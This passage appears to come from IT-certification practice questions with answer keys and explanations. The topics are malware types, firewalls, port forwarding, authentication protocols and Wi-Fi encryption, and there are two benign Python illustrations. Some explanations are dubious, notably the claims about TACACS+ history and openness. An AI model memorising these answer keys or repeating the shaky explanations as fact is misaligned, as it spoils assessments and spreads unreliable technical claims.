Ransomware is a type of malware that encrypts a user’s files or locks them out of their system, demanding a ransom payment (in this case, $200) in exchange for regaining access to the files. The key characteristics of ransomware are: The user is locked out of their files (often with a blank screen or message). A demand for payment is made (often involving cryptocurrency or credit card details). The attacker promises to restore access to the files once the ransom is paid, though this is often a scam. Ransomware can be devastating, as it renders critical files or systems inaccessible and demands payment to decrypt or unlock them. Why the other options are incorrect: Spyware: This malware silently monitors user activities, such as keystrokes, but does not lock or demand money for files. Rootkit: A rootkit hides its presence in the system to maintain privileged access, but it doesn’t typically lock files or demand ransom. Trojan: A Trojan horse disguises itself as legitimate software, but it doesn’t typically lock files or ask for ransom. It may, however, be used to install ransomware. Ransomware is increasingly common, and it’s important to maintain regular backups and use security software to prevent such attacks.
What kind of malware poses a risk to the system because it loads during startup before the antivirus software can?
Ransomware
Boot sector virus
Spyware
Keylogger
A boot sector virus is a type of malware that infects the boot sector of a computer’s hard drive or storage device. The boot sector is responsible for loading the operating system when the system starts up. This type of virus is particularly dangerous because it loads before the operating system and before antivirus software can run, making it harder for security software to detect or stop the infection. Because the boot sector virus activates early in the boot process, it can take control of the system before any protective measures are in place, potentially allowing it to evade detection by antivirus software. Why the other options are incorrect: Ransomware: This is a type of malware that encrypts the user’s files and demands payment for decryption. While it can cause significant damage, it typically doesn’t load before antivirus software during startup. Spyware: Spyware monitors user activity, such as keystrokes, but doesn’t typically infect the system at the boot level, so it’s not as stealthy as a boot sector virus. Keylogger: A keylogger records keystrokes but is usually installed after the system is running and doesn’t need to load before antivirus protection like a boot sector virus does.
What security measure would prevent unauthorized network traffic from probing a user’s workstation?
Anti-malware
Antivirus
Software firewall
Anti-phishing training
A software firewall acts as a barrier between a user’s workstation and the network, controlling the incoming and outgoing traffic based on predetermined security rules. It helps prevent unauthorized network traffic from probing or accessing the workstation by blocking suspicious or unauthorized requests. The firewall can filter traffic, allowing only trusted connections and preventing malicious network probes or attempts to exploit vulnerabilities on the system. Why the other options are incorrect: Anti-malware: Helps detect and remove malware on a system but does not directly block unauthorized network traffic. Antivirus: Primarily focuses on detecting and removing viruses, not specifically on controlling network traffic. Antiphishing training: Educates users on how to avoid phishing attacks but does not address unauthorized network probing. A software firewall provides an essential layer of defense, particularly when connected to public or untrusted networks, by preventing unauthorized access attempts.
A laptop user is unaware of software that has been installed on the machine. The software has been tracking the user’s keystrokes and has transmitted them to an attacker. What kind of threat is this?
Spoofing
Zombie/Botnet
Spyware
Ransomware
Spyware is a type of malicious software designed to secretly monitor and collect data from a user’s system, often without their knowledge or consent. In this case, the software is tracking keystrokes and sending them to an attacker, which is a typical characteristic of a keylogger, a type of spyware. Spyware can: Capture keystrokes (keylogging) Monitor browsing activity Gather sensitive data (e.g., passwords, credit card info) Transmit this data to cybercriminals Why the others are incorrect: Spoofing: Involves pretending to be someone or something else to gain unauthorized access, but not tracking or stealing data. Zombie/botnet: Refers to a collection of infected devices controlled by an attacker for malicious purposes, often used for DDoS attacks, but not for tracking keystrokes. Ransomware: Encrypts the user’s files and demands payment for decryption, not related to tracking activity or keylogging.
A user’s Windows computer completely locked up. A notification displayed on the screen stated that the person pictured had engaged in criminal activity; the webcam had turned on automatically and captured an image of the user. The notification also stated that the user could settle the allegations against him/her by paying a $500 fine. The user was understandably shaken by the incident. What would be the BEST course of action in this situation?
Tell the user that if they performed an illegal activity with their work computer, their employment will be terminated.
Delete and reinstall Windows.
Boot to a bootable media from your anti-malware provider and run a remediation.
Pay the fine.
This situation is a classic example of scareware or ransomware, often referred to as “police ransomware” or “locker ransomware”. It locks the system, shows an intimidating message, and demands payment, typically under the pretense of law enforcement action. The best course of action is to: Avoid paying the fine, as it’s a scam and won’t fix the issue. Do not delete and reinstall Windows immediately, as this could lead to data loss. Use a bootable antivirus rescue disk (from a trusted provider like Kaspersky, Bitdefender, etc.) to boot the system externally, bypassing the infected OS, and run a deep scan and removal process. This method allows you to remove the malware safely without risking files or further compromising the system. Why the others are wrong: Telling the user about termination adds fear and doesn’t help resolve the incident. Reinstalling Windows can remove the malware but should be a last resort due to data loss risk. Paying the fine encourages cybercriminals and doesn’t guarantee system access restoration.
At the root of his user directory, a user finds a strange text file. Everything the user has typed in the last few days, including his credentials, is in it. Why does this text file exist?
Email application in debug mode.
System auditing enabled
Backup file
Keylogger installed
A keylogger is malicious software or hardware that records every keystroke a user makes, often without their knowledge. If a text file contains everything the user has typed—especially sensitive information like credentials—that strongly indicates the presence of a keylogger. Keyloggers are commonly used by attackers to: Steal login credentials Monitor user activity Collect personal or financial data Why the other options are incorrect: Email application in debug mode: May log certain actions, but not all keystrokes or credentials across applications. System auditing enabled: Typically logs events like logins or file accesses—not raw keystrokes. Backup file: Would contain specific saved data, not an ongoing log of keystrokes.
What kind of security risk grants an attacker administrative-level access so they can carry out another attack while hiding their existence from system management tools?
Ransomware
Whaling
Rootkit
Virus
A rootkit is a type of malicious software designed to gain and maintain privileged (administrative-level) access to a computer while hiding its presence from system monitoring tools. Rootkits can: Modify core system files and processes Hide other malware (like keyloggers or ransomware) Allow attackers to remotely control the system undetected Rootkits are especially dangerous because they operate at a low level, often within the operating system kernel, making them hard to detect and remove. Why the others are incorrect: Ransomware: Encrypts files and demands payment but doesn’t necessarily hide itself or maintain admin access silently. Whaling: A type of phishing targeting high-level executives; it’s a social engineering attack, not malware. Virus: Spreads by infecting files or programs, but doesn’t inherently hide its presence or provide stealthy admin access.
While accessing the Wi-Fi at your favorite coffee shop, you suddenly realize that your mouse is moving even though you are not touching it. You were aware that accessing this public Wi-Fi was a bad idea, and now you have been hacked. You want to stop the attacker as quickly as you can, but you need some time to save your files. What should you do?
Close the lid on the laptop.
Turn on Airplane mode.
Unhook the network cable.
Turn the laptop’s power off.
Turning on Airplane mode immediately disables all wireless communications, including Wi-Fi, Bluetooth, and cellular, without shutting down your computer. This helps in disconnecting the attacker while allowing you to still access your system to save your files or perform local tasks. Here’s why the other options are less effective: Close the lid on the laptop: This typically puts the laptop into sleep mode, which doesn’t cut off the connection immediately and may interrupt your chance to save files properly. Unhook the network cable: This only works if you’re connected via Ethernet. Since this is a Wi-Fi network, unhooking a cable likely has no effect. Turn the laptop’s power off: This would disconnect the attacker but also prevents you from saving your files, potentially causing data loss. Airplane mode is the fastest and safest way to cut off external access while keeping your session alive long enough to respond properly.
You just installed a security camera that is connected to your SOHO router and communicates on port 4150. You can’t see the video stream from your computer or another computer after setting up the camera. What did you forget to do?
Disable the firewall.
Close port 4150.
Configure port forwarding on the router.
Connect the camera to the router.
Port forwarding is necessary when you have a device on your local network (like the security camera) that needs to be accessed from outside the network or from another device on the network. If your camera communicates on port 4150, you’ll need to configure the router to forward incoming traffic on that port to the camera’s local IP address. This allows your computer or any other device to access the camera’s video stream. Without port forwarding, even if the camera is connected to the router, the router won’t know where to direct the traffic for that specific port. This results in a failure to access the camera from your computer or any other device on the network. Why the other options are incorrect: Disable the firewall: This is not the correct solution, as disabling the firewall would expose your network to security risks. You only need to configure the firewall (via port forwarding) to allow the specific traffic you want, not disable it completely. Close port 4150: Closing the port would prevent access to the camera’s video stream, which is the opposite of what you want to achieve. You need to keep port 4150 open but forward it to the camera’s IP. Connect the camera to the router: While connecting the camera to the router is essential for it to communicate with your network, the issue in this case is that the router is not forwarding the traffic for port 4150 to the camera. This is the root cause of the problem. Therefore, configuring port forwarding on the router for port 4150 to the camera’s local IP address is the solution to this issue.
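Under the hood, a port-forwarding rule is just a lookup table the router consults for inbound traffic: anything arriving on external port X goes to a specific internal IP and port. The Python sketch below models that table for the camera scenario; the 192.168.1.x address and the port 4150 mapping are illustrative, not a real router configuration interface.

```python
# Port-forwarding table as the router conceptually stores it:
# external (WAN) port -> (internal LAN address, internal port)
forwarding_rules = {
    4150: ("192.168.1.50", 4150),   # security camera's video stream
}

def route_inbound(external_port: int) -> str:
    """Decide where the router sends an inbound packet."""
    if external_port in forwarding_rules:
        ip, port = forwarding_rules[external_port]
        return f"forward to {ip}:{port}"
    return "no rule -> packet dropped (this is why the stream was unreachable)"

print(4150, "->", route_inbound(4150))   # with the rule configured
del forwarding_rules[4150]
print(4150, "->", route_inbound(4150))   # the original misconfiguration
```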
What is NOT a type of malware that needs to be removed from a computer system?
Keylogger
Spyware
WinRE
Virus
WinRE (the Windows Recovery Environment) is a built-in Windows troubleshooting and recovery tool, not malware, so it is not something that needs to be removed. Keyloggers, spyware, and viruses are all types of malware that should be removed from a computer system.
In order to verify that both parties to a transaction are who they claim to be and to encrypt their user information as it is transmitted from one to the other, you need a protocol or process when configuring a remote connection. What will you use?
Kerberos
Multifactor authentication
TKIP
RADIUS
Kerberos is an authentication protocol designed to provide secure verification of both parties’ identities in a network transaction, and it also encrypts the communication between those parties. It was developed by MIT and is widely used in network environments to ensure that both the client and server can trust each other. It works by using tickets that are exchanged between the client and server for mutual authentication. Mutual Authentication: Kerberos ensures that both the client and the server are who they claim to be, which is essential for preventing man-in-the-middle attacks. Encryption: Kerberos encrypts data as it is transmitted, ensuring confidentiality and protection against eavesdropping during the transaction. Why the other options are incorrect: Multifactor authentication (MFA): MFA is a security process where multiple forms of authentication (such as a password and a biometric scan) are required to verify the identity of a user. While MFA adds extra security, it does not encrypt information during transmission or ensure both parties are who they claim to be in the same way Kerberos does. TKIP: TKIP is an encryption protocol used primarily for WPA (Wi-Fi Protected Access) and is not designed for authenticating or encrypting user information in a transaction context. RADIUS: RADIUS (Remote Authentication Dial-In User Service) is an authentication protocol for managing network access, but it does not encrypt information being transmitted in the way that Kerberos does. In conclusion, Kerberos is the correct protocol for verifying both parties’ identities and ensuring secure encryption of user information during a transaction.
What 128-bit block encryption is used in WPA2, more secure than TKIP, and uses an encryption key of 128, 192, or 256 bits?
AES
RADIUS
Kerberos
VPN
AES (Advanced Encryption Standard) is the encryption algorithm used in WPA2 (Wi-Fi Protected Access 2) to secure wireless network transmissions. It is a 128-bit block cipher that is more secure than TKIP (Temporal Key Integrity Protocol), which was used in WPA. AES is highly regarded for its strength and efficiency, making it the standard encryption method for WPA2. Key features of AES: Block Cipher: AES operates as a block cipher, meaning it encrypts data in fixed-size blocks, in this case, 128 bits at a time. Key Sizes: AES supports key sizes of 128, 192, or 256 bits, with 256-bit AES being the most secure option. Security: AES is a symmetric-key algorithm, meaning the same key is used for both encryption and decryption. It is considered highly secure and resistant to attacks like brute force or cryptanalysis. Use in WPA2: WPA2 uses AES for encryption of the data transmitted over the wireless network, providing significantly stronger protection than the older TKIP used in WPA. Why the other options are incorrect: RADIUS: RADIUS (Remote Authentication Dial-In User Service) is an authentication protocol, not an encryption method. It is often used for authenticating users on wireless networks but does not provide encryption for the data transmitted over the network. Kerberos: Kerberos is an authentication protocol used to verify the identity of users and computers on a network, but it does not directly relate to the encryption of wireless traffic. VPN (Virtual Private Network): A VPN encrypts traffic over a network, but it is not specific to wireless encryption like AES. It is a broader security measure that creates a secure tunnel for data to travel through, typically over the internet. Thus, AES is the correct answer because it is the 128-bit block encryption algorithm used in WPA2, offering stronger security than TKIP and supporting key sizes of 128, 192, or 256 bits.
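To give a feel for what AES usage looks like in software, here is a short sketch using the third-party `cryptography` package (`pip install cryptography`) to encrypt and decrypt a message with a 256-bit key. Note that this uses AES-GCM for simplicity; WPA2 itself wraps AES in the CCMP construction, which this example does not reproduce.

```python
import os

from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=256)   # AES supports 128-, 192-, or 256-bit keys
aesgcm = AESGCM(key)
nonce = os.urandom(12)                      # must be unique per message

ciphertext = aesgcm.encrypt(nonce, b"wireless frame payload", None)
plaintext = aesgcm.decrypt(nonce, ciphertext, None)

print("Ciphertext bytes:", len(ciphertext))  # payload + 16-byte authentication tag
print("Recovered:", plaintext)
```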
You are setting up a wireless network for a small office. What should you enable to ensure that network transmissions are encrypted as best as possible?
WPS
WPA3
WPA
WEP
WPA3 (Wi-Fi Protected Access 3) is the most secure wireless encryption protocol available for modern wireless networks. It provides the highest level of encryption and security for network transmissions, significantly improving upon previous standards like WPA2 and WEP. Key Features of WPA3: Stronger Encryption: WPA3 uses AES (Advanced Encryption Standard) encryption, with a 192-bit security mode (using 256-bit AES keys) available in WPA3-Enterprise, and offers stronger protections overall than the encryption methods used in WPA2 and WEP. Forward Secrecy: WPA3 provides forward secrecy, meaning that even if an encryption key is compromised in the future, past communications remain secure. Protection Against Brute-Force Attacks: WPA3 incorporates Simultaneous Authentication of Equals (SAE), which is more resistant to brute-force attacks compared to WPA2’s PSK (Pre-Shared Key) method. Enhanced Open Security: WPA3 also offers Opportunistic Wireless Encryption (OWE), providing encryption for open networks (without passwords) to protect users from eavesdropping. Why the other options are incorrect: WPS (Wi-Fi Protected Setup): WPS is a feature designed to simplify the connection process between devices and a router, but it does not provide encryption. In fact, it has been found to have several security vulnerabilities and is generally recommended to be disabled. WPA: WPA (Wi-Fi Protected Access) was an improvement over WEP, but it uses TKIP (Temporal Key Integrity Protocol), which is considered less secure than the encryption methods used in WPA2 or WPA3. WEP (Wired Equivalent Privacy): WEP is an outdated and highly insecure encryption protocol. It is easily cracked with modern tools and should never be used for securing a wireless network. Therefore, WPA3 is the correct choice because it provides the strongest encryption and security available for modern wireless networks, ensuring your small office’s network transmissions are as secure as possible.
Which protocol was created to authenticate remote users to a dial-in access server?
TKIP
VPN
TACACS+
RADIUS
RADIUS (Remote Authentication Dial-In User Service) was specifically created to authenticate remote users who are connecting to a dial-in access server or any network device remotely. It is a protocol that provides centralized authentication, authorization, and accounting (AAA) for users accessing a network. Key points about RADIUS: Authentication: RADIUS verifies the identity of users trying to access the network via dial-up or VPN connections. Authorization: RADIUS determines what resources the authenticated user can access. Accounting: RADIUS keeps track of user activity for billing or auditing purposes. Remote access: RADIUS was initially designed to support remote dial-in users but has since expanded to support Wi-Fi, VPNs, and other remote access technologies. Why the other options are incorrect: TKIP: Temporal Key Integrity Protocol is an encryption method used in wireless networks (specifically WPA) to secure data transmissions, but it does not relate to remote user authentication. VPN (Virtual Private Network): A VPN is a secure tunnel used to connect remote users to a network, but it does not authenticate users by itself. It can use RADIUS or other authentication protocols for user verification. TACACS+: TACACS+ is another authentication protocol developed by Cisco. It is used for managing network device access, especially for administrators, rather than for authenticating remote users to dial-in access servers. Therefore, RADIUS is the correct answer because it was specifically developed to authenticate and manage remote users connecting to dial-in access servers.
Which wireless protocol does WPA utilize to make up for WEP’s weak encryption?
AES
VLAN
VPN
TKIP
TKIP (Temporal Key Integrity Protocol) was introduced as part of WPA (Wi-Fi Protected Access) to address the weaknesses of WEP (Wired Equivalent Privacy), which was easily vulnerable to attacks due to its static encryption keys. Key points about TKIP: TKIP provides dynamic encryption keys that change frequently to make it more secure than WEP. It uses a per-packet key system, which significantly reduces the risk of key reuse and improves the overall security of wireless communications. TKIP was designed to be backward compatible with existing hardware that supported WEP, allowing for a smooth transition to WPA without requiring new hardware. While AES (Advanced Encryption Standard) is more secure and was adopted in WPA2 for stronger encryption, TKIP was the immediate solution in WPA to improve security over WEP without requiring new hardware. Why the other options are incorrect: AES: AES is used in WPA2 for stronger encryption, but it was not used in WPA for the purpose of replacing WEP’s weak encryption. VLAN (Virtual Local Area Network): VLAN is a network segmentation technology and is unrelated to wireless encryption. VPN (Virtual Private Network): VPN provides secure communication over networks, but it is not related to wireless encryption protocols like WPA. Therefore, TKIP is the correct answer because it was the protocol used in WPA to replace the weak encryption provided by WEP.
What is the oldest authentication encryption protocol that Cisco developed but became an open protocol in the 1990s and is available on Linux distributions?
AES
RADIUS
Kerberos
TACACS+
TACACS+ (Terminal Access Controller Access-Control System Plus) is the oldest authentication encryption protocol developed by Cisco. Although TACACS itself (the original version) was proprietary, TACACS+ became more widely recognized in the 1990s as Cisco’s open protocol for authentication, authorization, and accounting (AAA) of network devices. Key details: TACACS+ was developed by Cisco to provide secure communication between network devices (like routers, switches, and firewalls) and centralized authentication servers. In the 1990s, TACACS+ became an open standard, which led to its wider adoption by multiple network vendors, including availability on Linux distributions. TACACS+ encrypts the entire communication between the device and the authentication server, making it more secure than earlier protocols like RADIUS. Why the other options are incorrect: AES: AES (Advanced Encryption Standard) is an encryption algorithm, not an authentication protocol, and it does not fit the description provided in the question. RADIUS: Although RADIUS is widely used and became an open protocol in the 1990s, TACACS+ is the correct answer because it is specifically Cisco-developed, whereas RADIUS was developed by Livingston Enterprises. Kerberos: While Kerberos is an important authentication protocol, it was not developed by Cisco and does not meet the criteria described in the question. Therefore, TACACS+ is the correct answer because it was developed by Cisco, became an open protocol in the 1990s, and is available on Linux distributions for secure authentication and management of network devices.
Which wireless encryption protocol employs TKIP and AES for backward compatibility and replaced WPA?
RADIUS
WEP
WPA2
WPA3
WPA2 (Wi-Fi Protected Access 2) is the encryption protocol that replaced WPA (Wi-Fi Protected Access) and employs TKIP (Temporal Key Integrity Protocol) and AES (Advanced Encryption Standard) for backward compatibility. Here’s how WPA2 works: WPA2 uses AES as the primary encryption method, which is more secure than the older encryption methods. To ensure backward compatibility with older devices that may not support AES, WPA2 also allows the use of TKIP, which was used in WPA (the predecessor to WPA2). Why the other options are incorrect: RADIUS: This is an authentication protocol, not an encryption protocol. It is often used for authenticating users in wireless networks but does not replace WPA or use TKIP/AES. WEP (Wired Equivalent Privacy): This is an older and insecure encryption protocol, which was used before WPA and WPA2. WEP has been deprecated due to its numerous security vulnerabilities. WPA3: This is the latest encryption standard, offering improved security over WPA2. However, WPA3 does not use TKIP and AES for backward compatibility; it only uses AES and does not support older devices as WPA2 does. Therefore, WPA2 is the correct answer because it replaces WPA and uses both TKIP and AES to provide compatibility with older and newer devices.
A failed SOHO router has been replaced by a new one. The devices on your network are a mix of older ones from a few years ago and newer ones from 2022. Which encryption method should you use to configure this new SOHO router?
WPA2
WPA3
WPA2/WPA3
WEP
When setting up a new SOHO (Small Office/Home Office) router, you should configure it to support WPA2/WPA3 encryption. This option allows the router to be compatible with both older devices (which may only support WPA2) and newer devices (which should support WPA3). Here’s why: WPA2 is widely supported by older devices, so it ensures that legacy devices (from a few years ago) can still connect securely. WPA3 is the latest Wi-Fi security standard and offers stronger encryption and improved protection against brute-force attacks, making it ideal for newer devices (like those from 2022). WPA2/WPA3 mixed mode allows the router to work in both WPA2 and WPA3 modes simultaneously, ensuring compatibility across a range of devices on your network. Why the other options are incorrect: WPA2: While it is still secure and widely supported, it lacks the improved security features of WPA3. WPA3: While it offers stronger security, it may not be supported by older devices, making it impractical for a mixed-device network. WEP: This is an outdated and insecure encryption method that should never be used, as it is easily compromised. Therefore, WPA2/WPA3 is the best choice to ensure security and compatibility for both older and newer devices on your network.